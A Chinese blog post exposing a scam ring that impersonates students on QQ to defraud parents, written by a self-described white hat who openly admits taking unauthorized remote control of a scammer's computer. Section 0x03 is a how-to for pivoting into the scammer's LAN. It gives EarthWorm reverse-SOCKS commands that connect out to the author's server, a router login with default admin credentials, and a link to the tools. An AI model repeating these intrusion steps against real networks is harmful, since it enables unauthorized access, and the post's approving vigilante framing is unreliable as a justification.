News:禁止使用本博客的技术文章、源码、工具等用于非法用途,否则后果自负。

【忍无可忍】揭秘一个专门针对学生家长下手的诈骗团伙

jasonx 287 0 条

前言

在互联网高速发展的今天,很多针对网络诈骗的骗术也在日益更新,虽然都在宣传如何防诈骗,但是不断更新的骗术,始终让人防不胜防。

今天我们揭秘的这个骗子充分利用家长对儿女的关爱,然后冒充子女的对这些家长进行诈骗,过程让人看了揪心、愤怒。

详情请外下看。

0x00 关于控制权

关于如何拿下骗子的控制权,非法控制骗子是否违法这里咱们暂不讨论。

我的目的很简单,曝光骗子及骗术,让广大网友避免上当受骗

曝光骗子的骗术,以及所有涉及到的QQ群(包括骗子暂时没有进行诈骗的群),这么做的目的是为了让广大网友知道其中的猫腻,知道如何防止这类诈骗发生。

0x01 先看一下骗子电脑上的信息

翻了一下桌面路径,发现很多以QQ群命名的txt文件,里面有很多家长的QQ号码,QQ备注昵称为【XXX妈妈】【XXX爸爸】。

这是桌面目录下

我们打开部分文件夹看到很多QQ群成员数据。

打开这些txt文件后,里面有很多家长的QQ号码,邮箱号码,以及以孩子名为备注的昵称。

0x02 开始分析

从上面可以发现,这些文件基本都是初中的班级群,至于骗子是如何拿到这些数据的,我们作了如下猜想;

  1. 骗子混入这些班级群,然后利用QQ群成员导出软件,导出成员数据。
  2. 骗子通过盗号手段,获取到群里某位成员的QQ账号密码,然后利用软件导出成员数据。
  3. 骗子通过其他渠道购买到这些群成员数据。
首先我们来看一下他的骗术过程。

骗子会用购买的QQ号,挨个添加家长的QQ,在添加的时候,验证的信息,填写成子女的名字。

比如他的数据是 李小红妈妈 QQ123456
骗子会先添加QQ 123456 然后验证信息写上,妈妈,我是李小红。

家长通过添加请求以后,骗子开始套路。

很多人以为骗子会打字和你聊,其实骗子都是有专门的 “话术” 的。

“话术” 就是先把很多要说的话,写在一个txt文本里面,然后逐条复制黏贴发送就行了。

以下是骗子 “话术” 的部分截图。

0x03 进入骗子内网

我们先用远控在后台执行一个查询本地IP和网关的命令,从他路由器开始搞起。

ipconfig

从下图中可以看到
他的本机IP地址是192.168.8.100
网关(也就是路由器)的IP是192.168.8.1

因为有他电脑控制权,所以进入他局域网就很简单了。
我们要进入他内网,看看是否还有其他同伙,或者是其他电脑。

这里我使用了EarthWorm进行了反弹代理

使用方法如下;
我们先下载好ew,一个放在本地,一个上传到骗子电脑上。

然后本地先执行以下命令进行监听;

ew.exe -s rcsocks -l 1008 -e 888

大概的意思就是监听本机的888端口,然后转发到1008端口。
注意,如果你在内网的话,需要先做好端口转发。

然后在通过远控,在骗子的电脑上执行以下命令;

ew.exe -s rssocks -d 2.2.2.2 -e 888

其中的2.2.2.2是你的外网IP,大概意思就是建立一个代理,主动连接到你的2.2.2.2服务器上,端口是888

当我们看到本地的监听窗口显示 rssocks cmd_socket ok!的时候,说明已经建立成功了。

现在打开SocksCap64添加一个代理。
设置ip地址为:127.0.0.1 端口为1008

在SocksCap64里面打开浏览器,输入对方的路由器地址。
默认账号密码admin进去了。

不出所料,和以往的骗子一样,使用的是华为上网设备,用的是流量卡,这种套路对侦查起来还是有点麻烦的。

切换语言为中文,然后看到里面有个【短信】功能。

其中发现了目前骗子正在使用的流量卡号

0x04 骗子的信息

作为一名普通的白帽子,尽我所力,我能做的也就这么多,接下来就看各位警察蜀黍的了。

地址:广西南宁

流量卡号:158xxxxx

IP地址:103.10.1.200 经查这是一个代理地址,没啥用。

以下是骗子的华为上网设备信息

0x05 被骗以及即将被骗的群

请以下群的群主或者管理员发下通知,让家长不要被骗了。

0x06 写在最后

请广大网友一定要谨记一点(任何涉及到金钱的东西,必须当面问清楚,或者打电话问清楚)
不要盲目相信对方就是你的亲人或者是你的朋友,因为任何人的社交账号,比如QQ,微信,都有被盗,被冒充的可能。

另外我知道在 “爱春秋论坛” 和 “知乎” 上有很多警察和网安的朋友,有愿意出手的可以联系【坏蛋】或者我本人,我将竭尽所能提供帮助。

用到的反弹代理配套工具可以去爱春秋原贴下载
https://bbs.ichunqiu.com/thread-46370-1-1.html

与本文相关的文章

发表我的评论

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址